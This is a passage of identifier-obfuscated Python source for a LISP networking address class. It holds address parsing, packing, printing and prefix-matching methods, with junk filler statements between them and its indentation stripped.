return ( oOOOo0o == 0x20010005 )
if 75 - 75: I11i * OoooooooOO % OoOoOO00 . i1IIi - Ii1I + iIii1I11I1II1
if 74 - 74: ooOoO0o
def addr_length ( self ) :
if ( self . afi == LISP_AFI_IPV4 ) : return ( 4 )
if ( self . afi == LISP_AFI_IPV6 ) : return ( 16 )
if ( self . afi == LISP_AFI_MAC ) : return ( 6 )
if ( self . afi == LISP_AFI_E164 ) : return ( 8 )
if ( self . afi == LISP_AFI_LCAF ) : return ( 0 )
if ( self . afi == LISP_AFI_NAME ) : return ( len ( self . address ) + 1 )
if ( self . afi == LISP_AFI_IID_RANGE ) : return ( 4 )
if ( self . afi == LISP_AFI_GEO_COORD ) :
return ( len ( self . address . print_geo ( ) ) )
if 18 - 18: iIii1I11I1II1 - I11i - oO0o
return ( 0 )
if 12 - 12: O0 + O0 + ooOoO0o . I1IiiI * II111iiii
if 47 - 47: i11iIiiIii % OOooOOo / ooOoO0o . IiII - I1IiiI
def afi_to_version ( self ) :
if ( self . afi == LISP_AFI_IPV4 ) : return ( 4 )
if ( self . afi == LISP_AFI_IPV6 ) : return ( 6 )
return ( 0 )
if 10 - 10: Oo0Ooo / ooOoO0o / I1ii11iIi11i
if 98 - 98: O0 - I1Ii111 - i11iIiiIii
def packet_format ( self ) :
if 85 - 85: II111iiii - I1ii11iIi11i % I1IiiI . I1IiiI - OoooooooOO - I11i
if 38 - 38: i1IIi + oO0o * ooOoO0o % Ii1I % ooOoO0o
if 80 - 80: OoO0O00 + OoOoOO00 % iII111i % OoooooooOO - ooOoO0o
if 25 - 25: OoOoOO00 % i11iIiiIii - I1IiiI * iIii1I11I1II1 - Oo0Ooo . O0
if 48 - 48: I1IiiI + oO0o % i11iIiiIii % iIii1I11I1II1
if ( self . afi == LISP_AFI_IPV4 ) : return ( "I" )
if ( self . afi == LISP_AFI_IPV6 ) : return ( "QQ" )
if ( self . afi == LISP_AFI_MAC ) : return ( "HHH" )
if ( self . afi == LISP_AFI_E164 ) : return ( "II" )
if ( self . afi == LISP_AFI_LCAF ) : return ( "I" )
return ( "" )
if 14 - 14: iIii1I11I1II1
if 78 - 78: I1Ii111 / Oo0Ooo - I1Ii111
def pack_address ( self ) :
Iii1iIII1Iii = self . packet_format ( )
OO0Oo00OO0oo = b""
if ( self . is_ipv4 ( ) ) :
OO0Oo00OO0oo = struct . pack ( Iii1iIII1Iii , socket . htonl ( self . address ) )
elif ( self . is_ipv6 ( ) ) :
III = byte_swap_64 ( self . address >> 64 )
I1I = byte_swap_64 ( self . address & 0xffffffffffffffff )
OO0Oo00OO0oo = struct . pack ( Iii1iIII1Iii , III , I1I )
elif ( self . is_mac ( ) ) :
oOOOo0o = self . address
III = ( oOOOo0o >> 32 ) & 0xffff
I1I = ( oOOOo0o >> 16 ) & 0xffff
iI1II1i1I = oOOOo0o & 0xffff
OO0Oo00OO0oo = struct . pack ( Iii1iIII1Iii , III , I1I , iI1II1i1I )
elif ( self . is_e164 ( ) ) :
oOOOo0o = self . address
III = ( oOOOo0o >> 32 ) & 0xffffffff
I1I = ( oOOOo0o & 0xffffffff )
OO0Oo00OO0oo = struct . pack ( Iii1iIII1Iii , III , I1I )
elif ( self . is_dist_name ( ) ) :
OO0Oo00OO0oo += ( self . address + "\0" ) . encode ( )
if 19 - 19: iIii1I11I1II1 / iII111i + OOooOOo . ooOoO0o
return ( OO0Oo00OO0oo )
if 85 - 85: i1IIi
if 78 - 78: oO0o
def unpack_address ( self , packet ) :
Iii1iIII1Iii = self . packet_format ( )
oOoOo000Ooooo = struct . calcsize ( Iii1iIII1Iii )
if ( len ( packet ) < oOoOo000Ooooo ) : return ( None )
if 6 - 6: IiII
oOOOo0o = struct . unpack ( Iii1iIII1Iii , packet [ : oOoOo000Ooooo ] )
if 69 - 69: iII111i
if ( self . is_ipv4 ( ) ) :
self . address = socket . ntohl ( oOOOo0o [ 0 ] )
if 87 - 87: i11iIiiIii % o0oOOo0O0Ooo + Ii1I
elif ( self . is_ipv6 ( ) ) :
if 72 - 72: Ii1I / II111iiii + o0oOOo0O0Ooo
if 33 - 33: I1Ii111 * OoOoOO00 - OoooooooOO
if 11 - 11: I1Ii111 - Oo0Ooo / iIii1I11I1II1 - OoooooooOO
if 71 - 71: Oo0Ooo + Ii1I - OoooooooOO + I11i - iIii1I11I1II1 / O0
if 76 - 76: i11iIiiIii % o0oOOo0O0Ooo . O0 * I11i
if 90 - 90: II111iiii + OOooOOo % I1Ii111 * iIii1I11I1II1 % iIii1I11I1II1
if 55 - 55: II111iiii % O0 * O0 - II111iiii * I1IiiI % Oo0Ooo
if 48 - 48: I1ii11iIi11i + OoooooooOO % i1IIi
if ( oOOOo0o [ 0 ] <= 0xffff and ( oOOOo0o [ 0 ] & 0xff ) == 0 ) :
i1iiI11 = ( oOOOo0o [ 0 ] << 48 ) << 64
else :
i1iiI11 = byte_swap_64 ( oOOOo0o [ 0 ] ) << 64
if 13 - 13: Oo0Ooo + iII111i * OoooooooOO % i11iIiiIii * II111iiii . OoooooooOO
I1iO00O = byte_swap_64 ( oOOOo0o [ 1 ] )
self . address = i1iiI11 | I1iO00O
if 9 - 9: oO0o - O0 . iIii1I11I1II1 . ooOoO0o
elif ( self . is_mac ( ) ) :
I1Oo0O = oOOOo0o [ 0 ]
i1i1I111iiIi1 = oOOOo0o [ 1 ]
ooo00OOOoOO = oOOOo0o [ 2 ]
self . address = ( I1Oo0O << 32 ) + ( i1i1I111iiIi1 << 16 ) + ooo00OOOoOO
if 22 - 22: OoOoOO00 / o0oOOo0O0Ooo % I1Ii111 % i11iIiiIii % I1IiiI
elif ( self . is_e164 ( ) ) :
self . address = ( oOOOo0o [ 0 ] << 32 ) + oOOOo0o [ 1 ]
if 22 - 22: o0oOOo0O0Ooo - I1Ii111
elif ( self . is_dist_name ( ) ) :
packet , self . address = lisp_decode_dist_name ( packet )
self . mask_len = len ( self . address ) * 8
oOoOo000Ooooo = 0
if 50 - 50: I11i - OoOoOO00 + I1IiiI % Oo0Ooo / OoooooooOO - I1ii11iIi11i
packet = packet [ oOoOo000Ooooo : : ]
return ( packet )
if 26 - 26: IiII . Ii1I
if 35 - 35: I1ii11iIi11i + OOooOOo
def is_ipv4 ( self ) :
return ( True if ( self . afi == LISP_AFI_IPV4 ) else False )
if 88 - 88: O0
if 4 - 4: OoOoOO00 % iIii1I11I1II1 % OoooooooOO . oO0o
def is_ipv4_link_local ( self ) :
if ( self . is_ipv4 ( ) == False ) : return ( False )
return ( ( ( self . address >> 16 ) & 0xffff ) == 0xa9fe )
if 27 - 27: II111iiii - OoOoOO00
if 81 - 81: o0oOOo0O0Ooo - Oo0Ooo % IiII - ooOoO0o / O0
def is_ipv4_loopback ( self ) :
if ( self . is_ipv4 ( ) == False ) : return ( False )
return ( self . address == 0x7f000001 )
if 27 - 27: Oo0Ooo
if 15 - 15: iIii1I11I1II1 . OoOoOO00 % Ii1I / i1IIi . o0oOOo0O0Ooo
def is_ipv4_multicast ( self ) :
if ( self . is_ipv4 ( ) == False ) : return ( False )
return ( ( ( self . address >> 24 ) & 0xf0 ) == 0xe0 )
if 45 - 45: iIii1I11I1II1 - i1IIi % I1IiiI - I1Ii111 + oO0o
if 15 - 15: iIii1I11I1II1 - OoooooooOO / ooOoO0o
def is_ipv4_string ( self , addr_str ) :
return ( addr_str . find ( "." ) != - 1 )
if 83 - 83: IiII + I1Ii111 / OoOoOO00 * IiII . oO0o
if 22 - 22: O0 + ooOoO0o + I1Ii111
def is_ipv6 ( self ) :
return ( True if ( self . afi == LISP_AFI_IPV6 ) else False )
if 57 - 57: OOooOOo . ooOoO0o - OoooooooOO - I1ii11iIi11i * O0
if 85 - 85: I1IiiI * OoO0O00
def is_ipv6_link_local ( self ) :
if ( self . is_ipv6 ( ) == False ) : return ( False )
return ( ( ( self . address >> 112 ) & 0xffff ) == 0xfe80 )
if 63 - 63: I1IiiI - i11iIiiIii
if 4 - 4: OOooOOo + iIii1I11I1II1 / I1IiiI * Ii1I
def is_ipv6_string_link_local ( self , addr_str ) :
return ( addr_str . find ( "fe80::" ) != - 1 )
if 64 - 64: OoOoOO00
if 94 - 94: OOooOOo * OoooooooOO * o0oOOo0O0Ooo / I1Ii111 . II111iiii
def is_ipv6_loopback ( self ) :
if ( self . is_ipv6 ( ) == False ) : return ( False )
return ( self . address == 1 )
if 37 - 37: O0 * II111iiii * I1IiiI - O0 - I11i / i1IIi
if 27 - 27: i11iIiiIii + iIii1I11I1II1
def is_ipv6_multicast ( self ) :
if ( self . is_ipv6 ( ) == False ) : return ( False )
return ( ( ( self . address >> 120 ) & 0xff ) == 0xff )
if 15 - 15: oO0o
if 69 - 69: II111iiii * O0 . ooOoO0o * IiII
def is_ipv6_string ( self , addr_str ) :
return ( addr_str . find ( ":" ) != - 1 )
if 25 - 25: I11i - I1ii11iIi11i . I1Ii111 . OoooooooOO
if 4 - 4: IiII * OoO0O00 % I1ii11iIi11i * Ii1I . iII111i
def is_mac ( self ) :
return ( True if ( self . afi == LISP_AFI_MAC ) else False )
if 41 - 41: OoooooooOO % I11i . O0 + I1Ii111
if 67 - 67: OoOoOO00 * OOooOOo / OOooOOo / OoooooooOO
def is_mac_multicast ( self ) :
if ( self . is_mac ( ) == False ) : return ( False )
return ( ( self . address & 0x010000000000 ) != 0 )
if 67 - 67: I11i - i1IIi . OoooooooOO / iIii1I11I1II1
if 34 - 34: OoO0O00 * II111iiii
def is_mac_broadcast ( self ) :
if ( self . is_mac ( ) == False ) : return ( False )
return ( self . address == 0xffffffffffff )
if 43 - 43: OoOoOO00 . I1IiiI
if 44 - 44: O0 / o0oOOo0O0Ooo
def is_mac_string ( self , addr_str ) :
return ( len ( addr_str ) == 15 and addr_str . find ( "-" ) != - 1 )
if 19 - 19: I11i
if 91 - 91: OOooOOo * OoooooooOO
def is_link_local_multicast ( self ) :
if ( self . is_ipv4 ( ) ) :
return ( ( 0xe0ffff00 & self . address ) == 0xe0000000 )
if 89 - 89: i1IIi / iII111i . I1Ii111
if ( self . is_ipv6 ( ) ) :
return ( ( self . address >> 112 ) & 0xffff == 0xff02 )
if 74 - 74: I1ii11iIi11i % iII111i / OoooooooOO / I1ii11iIi11i % i11iIiiIii % ooOoO0o
return ( False )
if 82 - 82: OoooooooOO . o0oOOo0O0Ooo * I1ii11iIi11i % I1ii11iIi11i * Ii1I
if 83 - 83: I11i - Oo0Ooo + i11iIiiIii - i11iIiiIii
def is_null ( self ) :
return ( True if ( self . afi == LISP_AFI_NONE ) else False )
if 64 - 64: IiII % I1IiiI / ooOoO0o
if 74 - 74: OoooooooOO
def is_ultimate_root ( self ) :
return ( True if self . afi == LISP_AFI_ULTIMATE_ROOT else False )
if 22 - 22: II111iiii . O0 * I1Ii111 % OoO0O00 / OoooooooOO + I1Ii111
if 71 - 71: ooOoO0o . oO0o * OoooooooOO + iII111i - I1Ii111 . I1ii11iIi11i
def is_iid_range ( self ) :
return ( True if self . afi == LISP_AFI_IID_RANGE else False )
if 100 - 100: I11i + O0 - o0oOOo0O0Ooo * I1ii11iIi11i
if 94 - 94: Oo0Ooo . IiII / Ii1I / oO0o - I1IiiI
def is_e164 ( self ) :
return ( True if ( self . afi == LISP_AFI_E164 ) else False )
if 77 - 77: i11iIiiIii . Ii1I - Ii1I
if 47 - 47: iII111i % OOooOOo . I1ii11iIi11i + I1ii11iIi11i . I1Ii111
def is_dist_name ( self ) :
return ( True if ( self . afi == LISP_AFI_NAME ) else False )
if 20 - 20: oO0o - o0oOOo0O0Ooo + I1IiiI % OoOoOO00
if 41 - 41: oO0o . ooOoO0o
def is_geo_prefix ( self ) :
return ( True if ( self . afi == LISP_AFI_GEO_COORD ) else False )
if 59 - 59: iIii1I11I1II1 - I1IiiI . ooOoO0o
if 58 - 58: I1IiiI * I1Ii111 + iII111i + iIii1I11I1II1 + I1IiiI
def is_binary ( self ) :
if ( self . is_dist_name ( ) ) : return ( False )
if ( self . is_geo_prefix ( ) ) : return ( False )
return ( True )
if 78 - 78: Oo0Ooo + ooOoO0o
if 56 - 56: OoO0O00 / i1IIi + ooOoO0o . ooOoO0o . iII111i
def store_address ( self , addr_str ) :
if ( self . afi == LISP_AFI_NONE ) : self . string_to_afi ( addr_str )
if 37 - 37: iIii1I11I1II1 * OoOoOO00 . OoOoOO00 + OoooooooOO + OoO0O00
if 25 - 25: I1IiiI / IiII . OOooOOo . I1ii11iIi11i % i1IIi
if 12 - 12: O0 % O0
if 9 - 9: O0 . I1IiiI + I1ii11iIi11i / OOooOOo * I1ii11iIi11i
OoOOoO0oOo = addr_str . find ( "[" )
I1I1II1iI = addr_str . find ( "]" )
if ( OoOOoO0oOo != - 1 and I1I1II1iI != - 1 ) :
self . instance_id = int ( addr_str [ OoOOoO0oOo + 1 : I1I1II1iI ] )
addr_str = addr_str [ I1I1II1iI + 1 : : ]
if ( self . is_dist_name ( ) == False ) :
addr_str = addr_str . replace ( " " , "" )
if 10 - 10: IiII % o0oOOo0O0Ooo / O0 / II111iiii
if 81 - 81: Ii1I / o0oOOo0O0Ooo % OoOoOO00 . I1ii11iIi11i
if 47 - 47: II111iiii + OOooOOo / II111iiii . OOooOOo
if 68 - 68: OoooooooOO
if 63 - 63: I1IiiI
if 80 - 80: oO0o + iIii1I11I1II1
if ( self . is_ipv4 ( ) ) :
oOo0000OOo = addr_str . split ( "." )
iiIiII11i1 = int ( oOo0000OOo [ 0 ] ) << 24
iiIiII11i1 += int ( oOo0000OOo [ 1 ] ) << 16
iiIiII11i1 += int ( oOo0000OOo [ 2 ] ) << 8
iiIiII11i1 += int ( oOo0000OOo [ 3 ] )
self . address = iiIiII11i1
elif ( self . is_ipv6 ( ) ) :
if 88 - 88: iII111i / I11i / I1ii11iIi11i + IiII * OoooooooOO . IiII
if 3 - 3: ooOoO0o - Oo0Ooo
if 86 - 86: I1ii11iIi11i * I1Ii111 / o0oOOo0O0Ooo . OoO0O00
if 14 - 14: I11i * IiII / iIii1I11I1II1
if 88 - 88: OoOoOO00 % II111iiii . I1IiiI / oO0o * IiII / i11iIiiIii
if 76 - 76: o0oOOo0O0Ooo
if 80 - 80: OOooOOo
if 15 - 15: OOooOOo . OoOoOO00 / oO0o . I1ii11iIi11i % OoO0O00 - oO0o
if 21 - 21: ooOoO0o . o0oOOo0O0Ooo . oO0o . i1IIi
if 96 - 96: Ii1I % I11i * OoooooooOO . I1IiiI . iIii1I11I1II1
if 8 - 8: O0 + o0oOOo0O0Ooo / O0 - I1ii11iIi11i % I1ii11iIi11i
if 55 - 55: OoooooooOO * OoooooooOO % I1Ii111 / Ii1I / ooOoO0o
if 12 - 12: i11iIiiIii + Ii1I % iIii1I11I1II1 + I1Ii111
if 12 - 12: Ii1I + I1Ii111 / O0 * II111iiii
if 67 - 67: iIii1I11I1II1 / I11i + ooOoO0o * I1Ii111 * oO0o
if 100 - 100: OoooooooOO % I1IiiI / OoOoOO00 % OoOoOO00 . o0oOOo0O0Ooo
if 81 - 81: Ii1I - II111iiii + I11i / Ii1I
OoOOo0 = ( addr_str [ 2 : 4 ] == "::" )
try :
addr_str = socket . inet_pton ( socket . AF_INET6 , addr_str )
except :
addr_str = socket . inet_pton ( socket . AF_INET6 , "0::0" )
if 49 - 49: Oo0Ooo % ooOoO0o % o0oOOo0O0Ooo + ooOoO0o * I1Ii111 % I1IiiI
addr_str = binascii . hexlify ( addr_str )
if 85 - 85: i1IIi / i1IIi
if ( OoOOo0 ) :
addr_str = addr_str [ 2 : 4 ] + addr_str [ 0 : 2 ] + addr_str [ 4 : : ]
if 77 - 77: i1IIi . ooOoO0o % ooOoO0o - Ii1I
self . address = int ( addr_str , 16 )
if 6 - 6: OOooOOo % Ii1I + ooOoO0o
elif ( self . is_geo_prefix ( ) ) :
OOiIiIi111ii1I1 = lisp_geo ( None )
OOiIiIi111ii1I1 . name = "geo-prefix-{}" . format ( OOiIiIi111ii1I1 )
OOiIiIi111ii1I1 . parse_geo_string ( addr_str )
self . address = OOiIiIi111ii1I1
elif ( self . is_mac ( ) ) :
addr_str = addr_str . replace ( "-" , "" )
iiIiII11i1 = int ( addr_str , 16 )
self . address = iiIiII11i1
elif ( self . is_e164 ( ) ) :
addr_str = addr_str [ 1 : : ]
iiIiII11i1 = int ( addr_str , 16 )
self . address = iiIiII11i1 << 4
elif ( self . is_dist_name ( ) ) :
self . address = addr_str . replace ( "'" , "" )
if 17 - 17: iIii1I11I1II1 * I1Ii111 % oO0o + o0oOOo0O0Ooo . Ii1I * Oo0Ooo
self . mask_len = self . host_mask_len ( )
if 16 - 16: I1IiiI % OoO0O00 . ooOoO0o / OoooooooOO
if 8 - 8: I1Ii111 % OoO0O00 . I1IiiI - OoOoOO00 + i1IIi / iIii1I11I1II1
def store_prefix ( self , prefix_str ) :
if ( self . is_geo_string ( prefix_str ) ) :
OOOooo0OooOoO = prefix_str . find ( "]" )
ooOoO00 = len ( prefix_str [ OOOooo0OooOoO + 1 : : ] ) * 8
elif ( prefix_str . find ( "/" ) != - 1 ) :
prefix_str , ooOoO00 = prefix_str . split ( "/" )
else :
Oo = prefix_str . find ( "'" )
if ( Oo == - 1 ) : return
o0 = prefix_str . find ( "'" , Oo + 1 )
if ( o0 == - 1 ) : return
ooOoO00 = len ( prefix_str [ Oo + 1 : o0 ] ) * 8
if 89 - 89: II111iiii / Ii1I % Ii1I
if 57 - 57: I11i
self . string_to_afi ( prefix_str )
self . store_address ( prefix_str )
self . mask_len = int ( ooOoO00 )
if 95 - 95: OoOoOO00 + I11i * i1IIi - ooOoO0o % ooOoO0o
if 58 - 58: OOooOOo
def zero_host_bits ( self ) :
if ( self . mask_len < 0 ) : return
OoI1111i1 = ( 2 ** self . mask_len ) - 1
oo00oOo0o0o = self . addr_length ( ) * 8 - self . mask_len
OoI1111i1 <<= oo00oOo0o0o
self . address &= OoI1111i1
if 94 - 94: i11iIiiIii % I1ii11iIi11i % IiII - I1Ii111
if 55 - 55: I11i - ooOoO0o - iIii1I11I1II1 + I1ii11iIi11i / IiII
def is_geo_string ( self , addr_str ) :
OOOooo0OooOoO = addr_str . find ( "]" )
if ( OOOooo0OooOoO != - 1 ) : addr_str = addr_str [ OOOooo0OooOoO + 1 : : ]
if 49 - 49: I1ii11iIi11i
OOiIiIi111ii1I1 = addr_str . split ( "/" )
if ( len ( OOiIiIi111ii1I1 ) == 2 ) :
if ( OOiIiIi111ii1I1 [ 1 ] . isdigit ( ) == False ) : return ( False )
if 91 - 91: OOooOOo % iII111i
OOiIiIi111ii1I1 = OOiIiIi111ii1I1 [ 0 ]
OOiIiIi111ii1I1 = OOiIiIi111ii1I1 . split ( "-" )
IiiiIiiiiI = len ( OOiIiIi111ii1I1 )
if ( IiiiIiiiiI < 8 or IiiiIiiiiI > 9 ) : return ( False )
if 7 - 7: Oo0Ooo / oO0o . I1Ii111 % I11i
for OooOoi1i in range ( 0 , IiiiIiiiiI ) :
if ( OooOoi1i == 3 ) :
if ( OOiIiIi111ii1I1 [ OooOoi1i ] in [ "N" , "S" ] ) : continue
return ( False )
if 34 - 34: iIii1I11I1II1 . i11iIiiIii - OoOoOO00
if ( OooOoi1i == 7 ) :
if ( OOiIiIi111ii1I1 [ OooOoi1i ] in [ "W" , "E" ] ) : continue
return ( False )
if 34 - 34: i11iIiiIii * OoooooooOO
if ( OOiIiIi111ii1I1 [ OooOoi1i ] . isdigit ( ) == False ) : return ( False )
if 74 - 74: OoooooooOO * iII111i % OOooOOo . OoooooooOO * I11i % I1Ii111
return ( True )
if 67 - 67: I11i * i1IIi
if 7 - 7: i1IIi * OoOoOO00 . Ii1I
def string_to_afi ( self , addr_str ) :
if ( addr_str . count ( "'" ) == 2 ) :
self . afi = LISP_AFI_NAME
return
if 80 - 80: OoOoOO00 + o0oOOo0O0Ooo - II111iiii
if ( addr_str . find ( ":" ) != - 1 ) : self . afi = LISP_AFI_IPV6
elif ( addr_str . find ( "." ) != - 1 ) : self . afi = LISP_AFI_IPV4
elif ( addr_str . find ( "+" ) != - 1 ) : self . afi = LISP_AFI_E164
elif ( self . is_geo_string ( addr_str ) ) : self . afi = LISP_AFI_GEO_COORD
elif ( addr_str . find ( "-" ) != - 1 ) : self . afi = LISP_AFI_MAC
else : self . afi = LISP_AFI_NONE
if 3 - 3: ooOoO0o * I1Ii111
if 34 - 34: Ii1I / Oo0Ooo . II111iiii - ooOoO0o - I1ii11iIi11i % OoOoOO00
def print_address ( self ) :
oOOOo0o = self . print_address_no_iid ( )
i1oO00O = "[" + str ( self . instance_id )
for OoOOoO0oOo in self . iid_list : i1oO00O += "," + str ( OoOOoO0oOo )
i1oO00O += "]"
oOOOo0o = "{}{}" . format ( i1oO00O , oOOOo0o )
return ( oOOOo0o )
if 43 - 43: Ii1I * oO0o
if 57 - 57: OoooooooOO + I1IiiI % I1ii11iIi11i % ooOoO0o * I1Ii111
def print_address_no_iid ( self ) :
if ( self . is_ipv4 ( ) ) :
oOOOo0o = self . address
i1i1I11iIiI1i1 = oOOOo0o >> 24
iIi1i1ii = ( oOOOo0o >> 16 ) & 0xff
I1111I = ( oOOOo0o >> 8 ) & 0xff
Oo000O0Oo0OO = oOOOo0o & 0xff
return ( "{}.{}.{}.{}" . format ( i1i1I11iIiI1i1 , iIi1i1ii , I1111I , Oo000O0Oo0OO ) )
elif ( self . is_ipv6 ( ) ) :
Oo0o = lisp_hex_string ( self . address ) . zfill ( 32 )
Oo0o = binascii . unhexlify ( Oo0o )
Oo0o = socket . inet_ntop ( socket . AF_INET6 , Oo0o )
return ( "{}" . format ( Oo0o ) )
elif ( self . is_geo_prefix ( ) ) :
return ( "{}" . format ( self . address . print_geo ( ) ) )
elif ( self . is_mac ( ) ) :
Oo0o = lisp_hex_string ( self . address ) . zfill ( 12 )
Oo0o = "{}-{}-{}" . format ( Oo0o [ 0 : 4 ] , Oo0o [ 4 : 8 ] ,
Oo0o [ 8 : 12 ] )
return ( "{}" . format ( Oo0o ) )
elif ( self . is_e164 ( ) ) :
Oo0o = lisp_hex_string ( self . address ) . zfill ( 15 )
return ( "+{}" . format ( Oo0o ) )
elif ( self . is_dist_name ( ) ) :
return ( "'{}'" . format ( self . address ) )
elif ( self . is_null ( ) ) :
return ( "no-address" )
if 78 - 78: i11iIiiIii . iIii1I11I1II1 % oO0o + OoooooooOO - OoOoOO00
return ( "unknown-afi:{}" . format ( self . afi ) )
if 9 - 9: I11i / iII111i * i11iIiiIii / OoOoOO00
if 86 - 86: O0 . O0 - I1Ii111
def print_prefix ( self ) :
if ( self . is_ultimate_root ( ) ) : return ( "[*]" )
if ( self . is_iid_range ( ) ) :
if ( self . mask_len == 32 ) : return ( "[{}]" . format ( self . instance_id ) )
O000 = self . instance_id + ( 2 ** ( 32 - self . mask_len ) - 1 )
return ( "[{}-{}]" . format ( self . instance_id , O000 ) )
if 12 - 12: OoooooooOO . OoooooooOO * I11i
oOOOo0o = self . print_address ( )
if ( self . is_dist_name ( ) ) : return ( oOOOo0o )
if ( self . is_geo_prefix ( ) ) : return ( oOOOo0o )
if 76 - 76: OoooooooOO - Ii1I + IiII % OoOoOO00 / OoooooooOO
OOOooo0OooOoO = oOOOo0o . find ( "no-address" )
if ( OOOooo0OooOoO == - 1 ) :
oOOOo0o = "{}/{}" . format ( oOOOo0o , str ( self . mask_len ) )
else :
oOOOo0o = oOOOo0o [ 0 : OOOooo0OooOoO ]
if 55 - 55: i11iIiiIii - IiII * OOooOOo + II111iiii . I1ii11iIi11i / O0
return ( oOOOo0o )
if 16 - 16: II111iiii . Oo0Ooo * I1Ii111 + o0oOOo0O0Ooo - i11iIiiIii
if 98 - 98: II111iiii - i1IIi - ooOoO0o
def print_prefix_no_iid ( self ) :
oOOOo0o = self . print_address_no_iid ( )
if ( self . is_dist_name ( ) ) : return ( oOOOo0o )
if ( self . is_geo_prefix ( ) ) : return ( oOOOo0o )
return ( "{}/{}" . format ( oOOOo0o , str ( self . mask_len ) ) )
if 36 - 36: IiII + o0oOOo0O0Ooo
if 81 - 81: OOooOOo / I11i % oO0o + ooOoO0o
def print_prefix_url ( self ) :
if ( self . is_ultimate_root ( ) ) : return ( "0--0" )
oOOOo0o = self . print_address ( )
OOOooo0OooOoO = oOOOo0o . find ( "]" )
if ( OOOooo0OooOoO != - 1 ) : oOOOo0o = oOOOo0o [ OOOooo0OooOoO + 1 : : ]
if ( self . is_geo_prefix ( ) ) :
oOOOo0o = oOOOo0o . replace ( "/" , "-" )
return ( "{}-{}" . format ( self . instance_id , oOOOo0o ) )
if 10 - 10: oO0o / i11iIiiIii
return ( "{}-{}-{}" . format ( self . instance_id , oOOOo0o , self . mask_len ) )
if 73 - 73: OoO0O00 - i1IIi
if 52 - 52: I1ii11iIi11i
def print_sg ( self , g ) :
I1iiIi111I = self . print_prefix ( )
I1I1Iii1 = I1iiIi111I . find ( "]" ) + 1
g = g . print_prefix ( )
IiI1II = g . find ( "]" ) + 1
i111i1iIi1 = "[{}]({}, {})" . format ( self . instance_id , I1iiIi111I [ I1I1Iii1 : : ] , g [ IiI1II : : ] )
return ( i111i1iIi1 )
if 14 - 14: Ii1I + I1IiiI - OoooooooOO . IiII - OOooOOo % IiII
if 19 - 19: IiII + I1ii11iIi11i % Oo0Ooo
def hash_address ( self , addr ) :
III = self . address
I1I = addr . address
if 32 - 32: OOooOOo
if ( self . is_geo_prefix ( ) ) : III = self . address . print_geo ( )
if ( addr . is_geo_prefix ( ) ) : I1I = addr . address . print_geo ( )
if 46 - 46: II111iiii . OoO0O00
if ( type ( III ) == str ) :
III = int ( binascii . hexlify ( III [ 0 : 1 ] ) )
if 97 - 97: oO0o
if ( type ( I1I ) == str ) :
I1I = int ( binascii . hexlify ( I1I [ 0 : 1 ] ) )
if 45 - 45: i11iIiiIii / IiII + OoO0O00
return ( III ^ I1I )
if 55 - 55: Ii1I / II111iiii - oO0o
if 58 - 58: i1IIi . OoooooooOO % iIii1I11I1II1 * o0oOOo0O0Ooo + O0 / oO0o
if 77 - 77: I11i . I1ii11iIi11i
if 92 - 92: i11iIiiIii + I11i % I1IiiI / ooOoO0o
if 28 - 28: i1IIi . I1IiiI
if 41 - 41: I1ii11iIi11i . I1Ii111 * OoOoOO00 . I1Ii111 / o0oOOo0O0Ooo
def is_more_specific ( self , prefix ) :
if ( prefix . afi == LISP_AFI_ULTIMATE_ROOT ) : return ( True )
if 41 - 41: o0oOOo0O0Ooo / o0oOOo0O0Ooo . Oo0Ooo
ooOoO00 = prefix . mask_len
if ( prefix . afi == LISP_AFI_IID_RANGE ) :
i1i1iIiII11i1 = 2 ** ( 32 - ooOoO00 )
ii1III1IiIII1 = prefix . instance_id
O000 = ii1III1IiIII1 + i1i1iIiII11i1
return ( self . instance_id in range ( ii1III1IiIII1 , O000 ) )
if 51 - 51: I1ii11iIi11i * OOooOOo
if 100 - 100: OoO0O00 * oO0o + I1IiiI - o0oOOo0O0Ooo . o0oOOo0O0Ooo % OoO0O00
if ( self . instance_id != prefix . instance_id ) : return ( False )
if ( self . afi != prefix . afi ) :
if ( prefix . afi != LISP_AFI_NONE ) : return ( False )
if 65 - 65: OoooooooOO / OoOoOO00 + I1IiiI - II111iiii / OoOoOO00
if 69 - 69: i11iIiiIii
if 77 - 77: I1ii11iIi11i % OoooooooOO - Oo0Ooo - Ii1I + I11i
if 93 - 93: I1IiiI % O0 * OoO0O00 % OoOoOO00 . I1Ii111 * I1IiiI
if 95 - 95: IiII + o0oOOo0O0Ooo - o0oOOo0O0Ooo
if ( self . is_binary ( ) == False ) :
if ( prefix . afi == LISP_AFI_NONE ) : return ( True )
if ( type ( self . address ) != type ( prefix . address ) ) : return ( False )
oOOOo0o = self . address
oOoOooo0000o0 = prefix . address
if ( self . is_geo_prefix ( ) ) :
oOOOo0o = self . address . print_geo ( )
oOoOooo0000o0 = prefix . address . print_geo ( )
if 41 - 41: IiII % i1IIi
if ( len ( oOOOo0o ) < len ( oOoOooo0000o0 ) ) : return ( False )
return ( oOOOo0o . find ( oOoOooo0000o0 ) == 0 )
if 34 - 34: o0oOOo0O0Ooo - iII111i / O0 / OOooOOo - Oo0Ooo
if 29 - 29: OoooooooOO - iII111i
if 97 - 97: I1Ii111 . Oo0Ooo
if 44 - 44: OoO0O00 + OOooOOo
if 9 - 9: iII111i . i11iIiiIii * IiII . I11i
if ( self . mask_len < ooOoO00 ) : return ( False )
if 40 - 40: i11iIiiIii + iII111i % I1IiiI % I11i - Oo0Ooo * ooOoO0o
oo00oOo0o0o = ( prefix . addr_length ( ) * 8 ) - ooOoO00
OoI1111i1 = ( 2 ** ooOoO00 - 1 ) << oo00oOo0o0o
return ( ( self . address & OoI1111i1 ) == prefix . address )
if 96 - 96: I1IiiI % I11i . I1Ii111 % O0 . O0
if 14 - 14: ooOoO0o . OoOoOO00 + ooOoO0o * OoOoOO00 . OoOoOO00 * Oo0Ooo
def mask_address ( self , mask_len ) :
oo00oOo0o0o = ( self . addr_length ( ) * 8 ) - mask_len
OoI1111i1 = ( 2 ** mask_len - 1 ) << oo00oOo0o0o
self . address &= OoI1111i1
if 40 - 40: OoooooooOO
if 14 - 14: o0oOOo0O0Ooo / OOooOOo . OoOoOO00 % iIii1I11I1II1 % OoOoOO00
def is_exact_match ( self , prefix ) :
if ( self . instance_id != prefix . instance_id ) : return ( False )
oOoOOO = self . print_prefix ( )
i11iiii = prefix . print_prefix ( ) if prefix else ""
return ( oOoOOO == i11iiii )
if 32 - 32: OoOoOO00 / iII111i / oO0o / ooOoO0o * i1IIi
if 35 - 35: I1ii11iIi11i + I11i
def is_local ( self ) :
if ( self . is_ipv4 ( ) ) :
Oo0OO0oO = lisp_myrlocs [ 0 ]
if ( Oo0OO0oO == None ) : return ( False )
